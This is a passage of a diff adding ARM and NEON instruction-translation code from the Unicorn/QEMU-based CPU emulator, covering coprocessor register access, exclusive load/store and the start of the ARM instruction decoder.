!extract32(insn, 7, 1); + TCGv_ptr fpst = get_fpstatus_ptr(s, 1); + TCGv_i32 tcg_rmode, tcg_shift; + int rmode = fp_decode_rm[extract32(insn, 8, 2)]; + + tcg_shift = tcg_const_i32(tcg_ctx, 0); + tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); + gen_helper_set_neon_rmode(tcg_ctx, tcg_rmode, tcg_rmode, + tcg_ctx->cpu_env); + + if (is_signed) { + gen_helper_vfp_tosls(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, + tcg_shift, fpst); + } else { + gen_helper_vfp_touls(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, + tcg_shift, fpst); + } + + gen_helper_set_neon_rmode(tcg_ctx, tcg_rmode, tcg_rmode, + tcg_ctx->cpu_env); + tcg_temp_free_i32(tcg_ctx, tcg_rmode); + tcg_temp_free_i32(tcg_ctx, tcg_shift); + tcg_temp_free_ptr(tcg_ctx, fpst); + break; + } + case NEON_2RM_VRECPE: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + gen_helper_recpe_u32(tcg_ctx, tmp, tmp, fpstatus); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_2RM_VRSQRTE: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + gen_helper_rsqrte_u32(tcg_ctx, tmp, tmp, fpstatus); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_2RM_VRECPE_F: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + gen_helper_recpe_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, fpstatus); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_2RM_VRSQRTE_F: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + gen_helper_rsqrte_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, fpstatus); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_2RM_VCVT_FS: /* VCVT.F32.S32 */ + gen_vfp_sito(s, 0, 1); + break; + case NEON_2RM_VCVT_FU: /* VCVT.F32.U32 */ + gen_vfp_uito(s, 0, 1); + break; + case NEON_2RM_VCVT_SF: /* VCVT.S32.F32 */ + gen_vfp_tosiz(s, 0, 1); + break; + case NEON_2RM_VCVT_UF: /* VCVT.U32.F32 */ + gen_vfp_touiz(s, 0, 1); + break; + default: + /* Reserved op values were caught by the + * neon_2rm_sizes[] check earlier. + */ + abort(); + } + if (neon_2rm_is_float_op(op)) { + tcg_gen_st_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, + neon_reg_offset(rd, pass)); + } else { + neon_store_reg(tcg_ctx, rd, pass, tmp); + } + } + break; + } + } else if ((insn & (1 << 10)) == 0) { + /* VTBL, VTBX. */ + int n = ((insn >> 8) & 3) + 1; + if ((rn + n) > 32) { + /* This is UNPREDICTABLE; we choose to UNDEF to avoid the + * helper function running off the end of the register file. + */ + return 1; + } + n <<= 3; + if (insn & (1 << 6)) { + tmp = neon_load_reg(tcg_ctx, rd, 0); + } else { + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + } + tmp2 = neon_load_reg(tcg_ctx, rm, 0); + tmp4 = tcg_const_i32(tcg_ctx, rn); + tmp5 = tcg_const_i32(tcg_ctx, n); + gen_helper_neon_tbl(tcg_ctx, tmp2, tcg_ctx->cpu_env, tmp2, tmp, tmp4, tmp5); + tcg_temp_free_i32(tcg_ctx, tmp); + if (insn & (1 << 6)) { + tmp = neon_load_reg(tcg_ctx, rd, 1); + } else { + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + } + tmp3 = neon_load_reg(tcg_ctx, rm, 1); + gen_helper_neon_tbl(tcg_ctx, tmp3, tcg_ctx->cpu_env, tmp3, tmp, tmp4, tmp5); + tcg_temp_free_i32(tcg_ctx, tmp5); + tcg_temp_free_i32(tcg_ctx, tmp4); + neon_store_reg(tcg_ctx, rd, 0, tmp2); + neon_store_reg(tcg_ctx, rd, 1, tmp3); + tcg_temp_free_i32(tcg_ctx, tmp); + } else if ((insn & 0x380) == 0) { + /* VDUP */ + if ((insn & (7 << 16)) == 0 || (q && (rd & 1))) { + return 1; + } + if (insn & (1 << 19)) { + tmp = neon_load_reg(tcg_ctx, rm, 1); + } else { + tmp = neon_load_reg(tcg_ctx, rm, 0); + } + if (insn & (1 << 16)) { + gen_neon_dup_u8(s, tmp, ((insn >> 17) & 3) * 8); + } else if (insn & (1 << 17)) { + if ((insn >> 18) & 1) + gen_neon_dup_high16(s, tmp); + else + gen_neon_dup_low16(s, tmp); + } + for (pass = 0; pass < (q ? 4 : 2); pass++) { + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, tmp2, tmp); + neon_store_reg(tcg_ctx, rd, pass, tmp2); + } + tcg_temp_free_i32(tcg_ctx, tmp); + } else { + return 1; + } + } + } + return 0; +} + +static int disas_coproc_insn(DisasContext *s, uint32_t insn) +{ + int cpnum, is64, crn, crm, opc1, opc2, isread, rt, rt2; + const ARMCPRegInfo *ri; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + cpnum = (insn >> 8) & 0xf; + + /* First check for coprocessor space used for XScale/iwMMXt insns */ + if (arm_dc_feature(s, ARM_FEATURE_XSCALE) && (cpnum < 2)) { + if (extract32(s->c15_cpar, cpnum, 1) == 0) { + return 1; + } + if (arm_dc_feature(s, ARM_FEATURE_IWMMXT)) { + return disas_iwmmxt_insn(s, insn); + } else if (arm_dc_feature(s, ARM_FEATURE_XSCALE)) { + return disas_dsp_insn(s, insn); + } + return 1; + } + + /* Otherwise treat as a generic register access */ + is64 = (insn & (1 << 25)) == 0; + if (!is64 && ((insn & (1 << 4)) == 0)) { + /* cdp */ + return 1; + } + + crm = insn & 0xf; + if (is64) { + crn = 0; + opc1 = (insn >> 4) & 0xf; + opc2 = 0; + rt2 = (insn >> 16) & 0xf; + } else { + crn = (insn >> 16) & 0xf; + opc1 = (insn >> 21) & 7; + opc2 = (insn >> 5) & 7; + rt2 = 0; + } + isread = (insn >> 20) & 1; + rt = (insn >> 12) & 0xf; + + ri = get_arm_cp_reginfo(s->cp_regs, + ENCODE_CP_REG(cpnum, is64, crn, crm, opc1, opc2)); + if (ri) { + /* Check access permissions */ + if (!cp_access_ok(s->current_el, ri, isread)) { + return 1; + } + + if (ri->accessfn || + (arm_dc_feature(s, ARM_FEATURE_XSCALE) && cpnum < 14)) { + /* Emit code to perform further access permissions checks at + * runtime; this may result in an exception. + * Note that on XScale all cp0..c13 registers do an access check + * call in order to handle c15_cpar. + */ + TCGv_ptr tmpptr; + TCGv_i32 tcg_syn; + uint32_t syndrome; + + /* Note that since we are an implementation which takes an + * exception on a trapped conditional instruction only if the + * instruction passes its condition code check, we can take + * advantage of the clause in the ARM ARM that allows us to set + * the COND field in the instruction to 0xE in all cases. + * We could fish the actual condition out of the insn (ARM) + * or the condexec bits (Thumb) but it isn't necessary. + */ + switch (cpnum) { + case 14: + if (is64) { + syndrome = syn_cp14_rrt_trap(1, 0xe, opc1, crm, rt, rt2, + isread, s->thumb); + } else { + syndrome = syn_cp14_rt_trap(1, 0xe, opc1, opc2, crn, crm, + rt, isread, s->thumb); + } + break; + case 15: + if (is64) { + syndrome = syn_cp15_rrt_trap(1, 0xe, opc1, crm, rt, rt2, + isread, s->thumb); + } else { + syndrome = syn_cp15_rt_trap(1, 0xe, opc1, opc2, crn, crm, + rt, isread, s->thumb); + } + break; + default: + /* ARMv8 defines that only coprocessors 14 and 15 exist, + * so this can only happen if this is an ARMv7 or earlier CPU, + * in which case the syndrome information won't actually be + * guest visible. + */ + assert(!arm_dc_feature(s, ARM_FEATURE_V8)); + syndrome = syn_uncategorized(); + break; + } + + gen_set_pc_im(s, s->pc); + tmpptr = tcg_const_ptr(tcg_ctx, ri); + tcg_syn = tcg_const_i32(tcg_ctx, syndrome); + gen_helper_access_check_cp_reg(tcg_ctx, tcg_ctx->cpu_env, tmpptr, tcg_syn); + tcg_temp_free_ptr(tcg_ctx, tmpptr); + tcg_temp_free_i32(tcg_ctx, tcg_syn); + } + + /* Handle special cases first */ + switch (ri->type & ~(ARM_CP_FLAG_MASK & ~ARM_CP_SPECIAL)) { + case ARM_CP_NOP: + return 0; + case ARM_CP_WFI: + if (isread) { + return 1; + } + gen_set_pc_im(s, s->pc); + s->is_jmp = DISAS_WFI; + return 0; + default: + break; + } + + if (isread) { + /* Read */ + if (is64) { + TCGv_i64 tmp64; + TCGv_i32 tmp; + if (ri->type & ARM_CP_CONST) { + tmp64 = tcg_const_i64(tcg_ctx, ri->resetvalue); + } else if (ri->readfn) { + TCGv_ptr tmpptr; + tmp64 = tcg_temp_new_i64(tcg_ctx); + tmpptr = tcg_const_ptr(tcg_ctx, ri); + gen_helper_get_cp_reg64(tcg_ctx, tmp64, tcg_ctx->cpu_env, tmpptr); + tcg_temp_free_ptr(tcg_ctx, tmpptr); + } else { + tmp64 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_ld_i64(tcg_ctx, tmp64, tcg_ctx->cpu_env, ri->fieldoffset); + } + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tmp64); + store_reg(s, rt, tmp); + tcg_gen_shri_i64(tcg_ctx, tmp64, tmp64, 32); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + store_reg(s, rt2, tmp); + } else { + TCGv_i32 tmp; + if (ri->type & ARM_CP_CONST) { + tmp = tcg_const_i32(tcg_ctx, ri->resetvalue); + } else if (ri->readfn) { + TCGv_ptr tmpptr; + tmp = tcg_temp_new_i32(tcg_ctx); + tmpptr = tcg_const_ptr(tcg_ctx, ri); + gen_helper_get_cp_reg(tcg_ctx, tmp, tcg_ctx->cpu_env, tmpptr); + tcg_temp_free_ptr(tcg_ctx, tmpptr); + } else { + tmp = load_cpu_offset(s->uc, ri->fieldoffset); + } + if (rt == 15) { + /* Destination register of r15 for 32 bit loads sets + * the condition codes from the high 4 bits of the value + */ + gen_set_nzcv(s, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + } else { + store_reg(s, rt, tmp); + } + } + } else { + /* Write */ + if (ri->type & ARM_CP_CONST) { + /* If not forbidden by access permissions, treat as WI */ + return 0; + } + + if (is64) { + TCGv_i32 tmplo, tmphi; + TCGv_i64 tmp64 = tcg_temp_new_i64(tcg_ctx); + tmplo = load_reg(s, rt); + tmphi = load_reg(s, rt2); + tcg_gen_concat_i32_i64(tcg_ctx, tmp64, tmplo, tmphi); + tcg_temp_free_i32(tcg_ctx, tmplo); + tcg_temp_free_i32(tcg_ctx, tmphi); + if (ri->writefn) { + TCGv_ptr tmpptr = tcg_const_ptr(tcg_ctx, ri); + gen_helper_set_cp_reg64(tcg_ctx, tcg_ctx->cpu_env, tmpptr, tmp64); + tcg_temp_free_ptr(tcg_ctx, tmpptr); + } else { + tcg_gen_st_i64(tcg_ctx, tmp64, tcg_ctx->cpu_env, ri->fieldoffset); + } + tcg_temp_free_i64(tcg_ctx, tmp64); + } else { + if (ri->writefn) { + TCGv_i32 tmp; + TCGv_ptr tmpptr; + tmp = load_reg(s, rt); + tmpptr = tcg_const_ptr(tcg_ctx, ri); + gen_helper_set_cp_reg(tcg_ctx, tcg_ctx->cpu_env, tmpptr, tmp); + tcg_temp_free_ptr(tcg_ctx, tmpptr); + tcg_temp_free_i32(tcg_ctx, tmp); + } else { + TCGv_i32 tmp = load_reg(s, rt); + store_cpu_offset(tcg_ctx, tmp, ri->fieldoffset); + } + } + } + + if (!isread && !(ri->type & ARM_CP_SUPPRESS_TB_END)) { + /* We default to ending the TB on a coprocessor register write, + * but allow this to be suppressed by the register definition + * (usually only necessary to work around guest bugs). + */ + gen_lookup_tb(s); + } + + return 0; + } + + /* Unknown register; this might be a guest error or a QEMU + * unimplemented feature. + */ + if (is64) { + qemu_log_mask(LOG_UNIMP, "%s access to unsupported AArch32 " + "64 bit system register cp:%d opc1: %d crm:%d\n", + isread ? "read" : "write", cpnum, opc1, crm); + } else { + qemu_log_mask(LOG_UNIMP, "%s access to unsupported AArch32 " + "system register cp:%d opc1:%d crn:%d crm:%d opc2:%d\n", + isread ? "read" : "write", cpnum, opc1, crn, crm, opc2); + } + + return 1; +} + + +/* Store a 64-bit value to a register pair. Clobbers val. */ +static void gen_storeq_reg(DisasContext *s, int rlow, int rhigh, TCGv_i64 val) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp; + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, val); + store_reg(s, rlow, tmp); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_shri_i64(tcg_ctx, val, val, 32); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, val); + store_reg(s, rhigh, tmp); +} + +/* load a 32-bit value from a register and perform a 64-bit accumulate. */ +static void gen_addq_lo(DisasContext *s, TCGv_i64 val, int rlow) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tmp; + TCGv_i32 tmp2; + + /* Load value and extend to 64 bits. */ + tmp = tcg_temp_new_i64(tcg_ctx); + tmp2 = load_reg(s, rlow); + tcg_gen_extu_i32_i64(tcg_ctx, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_gen_add_i64(tcg_ctx, val, val, tmp); + tcg_temp_free_i64(tcg_ctx, tmp); +} + +/* load and add a 64-bit value from a register pair. */ +static void gen_addq(DisasContext *s, TCGv_i64 val, int rlow, int rhigh) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tmp; + TCGv_i32 tmpl; + TCGv_i32 tmph; + + /* Load 64-bit value rd:rn. */ + tmpl = load_reg(s, rlow); + tmph = load_reg(s, rhigh); + tmp = tcg_temp_new_i64(tcg_ctx); + tcg_gen_concat_i32_i64(tcg_ctx, tmp, tmpl, tmph); + tcg_temp_free_i32(tcg_ctx, tmpl); + tcg_temp_free_i32(tcg_ctx, tmph); + tcg_gen_add_i64(tcg_ctx, val, val, tmp); + tcg_temp_free_i64(tcg_ctx, tmp); +} + +/* Set N and Z flags from hi|lo. */ +static void gen_logicq_cc(DisasContext *s, TCGv_i32 lo, TCGv_i32 hi) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_NF, hi); + tcg_gen_or_i32(tcg_ctx, tcg_ctx->cpu_ZF, lo, hi); +} + +/* Load/Store exclusive instructions are implemented by remembering + the value/address loaded, and seeing if these are the same + when the store is performed. This should be sufficient to implement + the architecturally mandated semantics, and avoids having to monitor + regular stores. + + In system emulation mode only one CPU will be running at once, so + this sequence is effectively atomic. In user emulation mode we + throw an exception and handle the atomic operation elsewhere. */ +static void gen_load_exclusive(DisasContext *s, int rt, int rt2, + TCGv_i32 addr, int size) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + + s->is_ldex = true; + + switch (size) { + case 0: + gen_aa32_ld8u(s, tmp, addr, get_mem_index(s)); + break; + case 1: + gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); + break; + case 2: + case 3: + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + break; + default: + abort(); + } + + if (size == 3) { + TCGv_i32 tmp2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tmp3 = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_addi_i32(tcg_ctx, tmp2, addr, 4); + gen_aa32_ld32u(s, tmp3, tmp2, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_gen_concat_i32_i64(tcg_ctx, tcg_ctx->cpu_exclusive_val, tmp, tmp3); + store_reg(s, rt2, tmp3); + } else { + tcg_gen_extu_i32_i64(tcg_ctx, tcg_ctx->cpu_exclusive_val, tmp); + } + + store_reg(s, rt, tmp); + tcg_gen_extu_i32_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, addr); +} + +static void gen_clrex(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, -1); +} + +#ifdef CONFIG_USER_ONLY +static void gen_store_exclusive(DisasContext *s, int rd, int rt, int rt2, + TCGv_i32 addr, int size) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_extu_i32_i64(tcg_ctx, cpu_exclusive_test, addr); + tcg_gen_movi_i32(tcg_ctx, cpu_exclusive_info, + size | (rd << 4) | (rt << 8) | (rt2 << 12)); + gen_exception_internal_insn(s, 4, EXCP_STREX); +} +#else +static void gen_store_exclusive(DisasContext *s, int rd, int rt, int rt2, + TCGv_i32 addr, int size) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp; + TCGv_i64 val64, extaddr; + int done_label; + int fail_label; + + /* if (env->exclusive_addr == addr && env->exclusive_val == [addr]) { + [addr] = {Rt}; + {Rd} = 0; + } else { + {Rd} = 1; + } */ + fail_label = gen_new_label(tcg_ctx); + done_label = gen_new_label(tcg_ctx); + extaddr = tcg_temp_new_i64(tcg_ctx); + tcg_gen_extu_i32_i64(tcg_ctx, extaddr, addr); + tcg_gen_brcond_i64(tcg_ctx, TCG_COND_NE, extaddr, tcg_ctx->cpu_exclusive_addr, fail_label); + tcg_temp_free_i64(tcg_ctx, extaddr); + + tmp = tcg_temp_new_i32(tcg_ctx); + switch (size) { + case 0: + gen_aa32_ld8u(s, tmp, addr, get_mem_index(s)); + break; + case 1: + gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); + break; + case 2: + case 3: + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + break; + default: + abort(); + } + + val64 = tcg_temp_new_i64(tcg_ctx); + if (size == 3) { + TCGv_i32 tmp2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tmp3 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_addi_i32(tcg_ctx, tmp2, addr, 4); + gen_aa32_ld32u(s, tmp3, tmp2, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_gen_concat_i32_i64(tcg_ctx, val64, tmp, tmp3); + tcg_temp_free_i32(tcg_ctx, tmp3); + } else { + tcg_gen_extu_i32_i64(tcg_ctx, val64, tmp); + } + tcg_temp_free_i32(tcg_ctx, tmp); + + tcg_gen_brcond_i64(tcg_ctx, TCG_COND_NE, val64, tcg_ctx->cpu_exclusive_val, fail_label); + tcg_temp_free_i64(tcg_ctx, val64); + + tmp = load_reg(s, rt); + switch (size) { + case 0: + gen_aa32_st8(s, tmp, addr, get_mem_index(s)); + break; + case 1: + gen_aa32_st16(s, tmp, addr, get_mem_index(s)); + break; + case 2: + case 3: + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + break; + default: + abort(); + } + tcg_temp_free_i32(tcg_ctx, tmp); + if (size == 3) { + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + tmp = load_reg(s, rt2); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[rd], 0); + tcg_gen_br(tcg_ctx, done_label); + gen_set_label(tcg_ctx, fail_label); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[rd], 1); + gen_set_label(tcg_ctx, done_label); + tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, -1); +} +#endif + +/* gen_srs: + * @env: CPUARMState + * @s: DisasContext + * @mode: mode field from insn (which stack to store to) + * @amode: addressing mode (DA/IA/DB/IB), encoded as per P,U bits in ARM insn + * @writeback: true if writeback bit set + * + * Generate code for the SRS (Store Return State) insn. + */ +static void gen_srs(DisasContext *s, + uint32_t mode, uint32_t amode, bool writeback) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int32_t offset; + TCGv_i32 addr = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tmp = tcg_const_i32(tcg_ctx, mode); + gen_helper_get_r13_banked(tcg_ctx, addr, tcg_ctx->cpu_env, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + switch (amode) { + case 0: /* DA */ + offset = -4; + break; + case 1: /* IA */ + offset = 0; + break; + case 2: /* DB */ + offset = -8; + break; + case 3: /* IB */ + offset = 4; + break; + default: + abort(); + } + tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); + tmp = load_reg(s, 14); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + tmp = load_cpu_field(s->uc, spsr); + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + if (writeback) { + switch (amode) { + case 0: + offset = -8; + break; + case 1: + offset = 4; + break; + case 2: + offset = -4; + break; + case 3: + offset = 0; + break; + default: + abort(); + } + tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); + tmp = tcg_const_i32(tcg_ctx, mode); + gen_helper_set_r13_banked(tcg_ctx, tcg_ctx->cpu_env, tmp, addr); + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_temp_free_i32(tcg_ctx, addr); +} + +static void disas_arm_insn(DisasContext *s, unsigned int insn) // qq +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int cond, val, op1, i, shift, rm, rs, rn, rd, sh; + TCGv_i32 tmp; + TCGv_i32 tmp2; + TCGv_i32 tmp3; + TCGv_i32 addr; + TCGv_i64 tmp64; + + /* M variants do not implement ARM mode. */ + if (arm_dc_feature(s, ARM_FEATURE_M)) { + goto illegal_op; + } + + // Unicorn: trace this instruction on request + if (HOOK_EXISTS_BOUNDED(s->uc, UC_HOOK_CODE, s->pc - 4)) { + gen_uc_tracecode(tcg_ctx, 4, UC_HOOK_CODE_IDX, s->uc, s->pc - 4); + // the callback might want to stop emulation immediately + check_exit_request(tcg_ctx); + } + + cond = insn >> 28; + if (cond == 0xf){ + /* In ARMv3 and v4 the NV condition is UNPREDICTABLE; we + * choose to UNDEF. In ARMv5 and above the space is used + * for miscellaneous unconditional instructions. + */ + ARCH(5); + + /* Unconditional instructions. */ + if (((insn >> 25) & 7) == 1) { + /* NEON Data processing. */ + if (!arm_dc_feature(s, ARM_FEATURE_NEON)) { + goto illegal_op; + } + + if (disas_neon_data_insn(s, insn)) { + goto illegal_op; + } + return; + } + if ((insn & 0x0f100000) == 0x04000000) { + /* NEON load/store. */ + if (!arm_dc_feature(s, ARM_FEATURE_NEON)) { + goto illegal_op; + } + + if (disas_neon_ls_insn(s, insn)) { + goto illegal_op; + } + return; + } + if ((insn & 0x0f000e10) == 0x0e000a00) { + /* VFP. */ + if (disas_vfp_insn(s, insn)) { + goto illegal_op; + } + return; + } + if (((insn & 0x0f30f000) == 0x0510f000) || + ((insn & 0x0f30f010) == 0x0710f000)) { + if ((insn & (1 << 22)) == 0) { + /* PLDW; v7MP */ + if (!arm_dc_feature(s, ARM_FEATURE_V7MP)) { + goto illegal_op; + } + } + /* Otherwise PLD; v5TE+ */ + ARCH(5TE); + return; + } + if (((insn & 0x0f70f000) == 0x0450f000) || + ((insn & 0x0f70f010) == 0x0650f000)) { + ARCH(7); + return; /* PLI; V7 */ + } + if (((insn & 0x0f700000) == 0x04100000) || + ((insn & 0x0f700010) == 0x06100000)) { + if (!arm_dc_feature(s, ARM_FEATURE_V7MP)) { + goto illegal_op; + } + return; /* v7MP: Unallocated memory hint: must NOP */ + } + + if ((insn & 0x0ffffdff) == 0x01010000) { + ARCH(6); + /* setend */ + if (((insn >> 9) & 1) != s->bswap_code) { + /* Dynamic endianness switching not implemented. */ + qemu_log_mask(LOG_UNIMP, "arm: unimplemented setend\n"); + goto illegal_op; + } + return; + } else if ((insn & 0x0fffff00) == 0x057ff000) { + switch ((insn >> 4) & 0xf) { + case 1: /* clrex */ + ARCH(6K); + gen_clrex(s); + return; + case 4: /* dsb */ + case 5: /* dmb */ + case 6: /* isb */ + ARCH(7); + /* We don't emulate caches so these are a no-op. */ + return; + default: + goto illegal_op; + } + } else if ((insn & 0x0e5fffe0) == 0x084d0500) { + /* srs */ + if (IS_USER(s)) { + goto illegal_op; + } + ARCH(6); + gen_srs(s, (insn & 0x1f), (insn >> 23) & 3, insn & (1 << 21)); + return; + } else if ((insn & 0x0e50ffe0) == 0x08100a00) { + /* rfe */ + int32_t offset; + if (IS_USER(s)) + goto illegal_op; + ARCH(6); + rn = (insn >> 16) & 0xf; + addr = load_reg(s, rn); + i = (insn >> 23) & 3; + switch (i) { + case 0: offset = -4; break; /* DA */ + case 1: offset = 0; break; /* IA */ + case 2: offset = -8; break; /* DB */ + case 3: offset = 4; break; /* IB */ + default: abort(); + } + if (offset) + tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); + /* Load PC into tmp and CPSR into tmp2. */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + tmp2 = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp2, addr, get_mem_index(s)); + if (insn & (1 << 21)) { + /* Base writeback. */ + switch (i) { + case 0: offset = -8; break; + case 1: offset = 4; break; + case 2: offset = -4; break; + case 3: offset = 0; break; + default: abort(); + } + if (offset) + tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); + store_reg(s, rn, addr); + } else { + tcg_temp_free_i32(tcg_ctx, addr); + } + gen_rfe(s, tmp, tmp2); + return; + } else if ((insn & 0x0e000000) == 0x0a000000) { + /* branch link and change to thumb (blx ) */ + int32_t offset; + + val = (uint32_t)s->pc; + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, val); + store_reg(s, 14, tmp); + /* Sign-extend the 24-bit offset */ + offset = ((int32_t)(insn << 8)) >> 8; + /* offset * 4 + bit24 * 2 + (thumb bit) */ + val += (((uint32_t)offset) << 2) | ((insn >> 23) & 2) | 1; + /* pipeline offset */ + val += 4; + /* protected by ARCH(5); above, near the start of uncond block */ + gen_bx_im(s, val); + return; + } else if ((insn & 0x0e000f00) == 0x0c000100) { + if (arm_dc_feature(s, ARM_FEATURE_IWMMXT)) { + /* iWMMXt register transfer. */ + if (extract32(s->c15_cpar, 1, 1)) { + if (!disas_iwmmxt_insn(s, insn)) { + return; + } + } + } + } else if ((insn & 0x0fe00000) == 0x0c400000) { + /* Coprocessor double register transfer. */ + ARCH(5TE); + } else if ((insn & 0x0f000010) == 0x0e000010) { + /* Additional coprocessor register transfer. */ + } else if ((insn & 0x0ff10020) == 0x01000000) { + uint32_t mask; + uint32_t val; + /* cps (privileged) */ + if (IS_USER(s)) + return; + mask = val = 0; + if (insn & (1 << 19)) { + if (insn & (1 << 8)) + mask |= CPSR_A; + if (insn & (1 << 7)) + mask |= CPSR_I; + if (insn & (1 << 6)) + mask |= CPSR_F; + if (insn & (1 << 18)) + val |= mask; + } + if (insn & (1 << 17)) { + mask |= CPSR_M; + val |= (insn & 0x1f); + } + if (mask) { + gen_set_psr_im(s, mask, 0, val); + } + return; + } + goto illegal_op; + } + if (cond != 0xe) { + /* if not always execute, we generate a conditional jump to + next instruction */ + s->condlabel = gen_new_label(tcg_ctx); + arm_gen_test_cc(tcg_ctx, cond ^ 1, s->condlabel); + s->condjmp = 1; + } + if ((insn & 0x0f900000) == 0x03000000) { + if ((insn & (1 << 21)) == 0) { + ARCH(6T2); + rd = (insn >> 12) & 0xf; + val = ((insn >> 4) & 0xf000) | (insn & 0xfff); + if ((insn & (1 << 22)) == 0) { + /* MOVW */ + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, val); + } else { + /* MOVT */ + tmp = load_reg(s, rd); + tcg_gen_ext16u_i32(tcg_ctx, tmp, tmp); + tcg_gen_ori_i32(tcg_ctx, tmp, tmp, val << 16); + } + store_reg(s, rd, tmp); + } else { + if (((insn >> 12) & 0xf) != 0xf) + goto illegal_op; + if (((insn >> 16) & 0xf) == 0) { + gen_nop_hint(s, insn & 0xff); + } else { + /* CPSR = immediate */ + val = insn & 0xff; + shift = ((insn >> 8) & 0xf) * 2; + if (shift) + val = (val >> shift) | (val << (32 - shift)); + i = ((insn & (1 << 22)) != 0); + if (gen_set_psr_im(s, msr_mask(s, (insn >> 16) & 0xf, i), + i, val)) { + goto illegal_op; + } + } + } + } else if ((insn & 0x0f900000) == 0x01000000 + && (insn & 0x00000090) != 0x00000090) { + /* miscellaneous instructions */ + op1 = (insn >> 21) & 3; + sh = (insn >> 4) & 0xf; + rm = insn & 0xf; + switch (sh) { + case 0x0: /* move program status register */ + if (op1 & 1) { + /* PSR = reg */ + tmp = load_reg(s, rm); + i = ((op1 & 2) != 0); + if (gen_set_psr(s, msr_mask(s, (insn >> 16) & 0xf, i), i, tmp)) + goto illegal_op; + } else { + /* reg = PSR */ + rd = (insn >> 12) & 0xf; + if (op1 & 2) { + if (IS_USER(s)) + goto illegal_op; + tmp = load_cpu_field(s->uc, spsr); + } else { + tmp = tcg_temp_new_i32(tcg_ctx); + gen_helper_cpsr_read(tcg_ctx, 